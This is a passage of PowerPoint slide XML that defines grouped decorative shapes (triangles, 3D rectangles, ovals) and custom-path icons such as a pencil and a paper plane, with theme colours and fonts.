                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
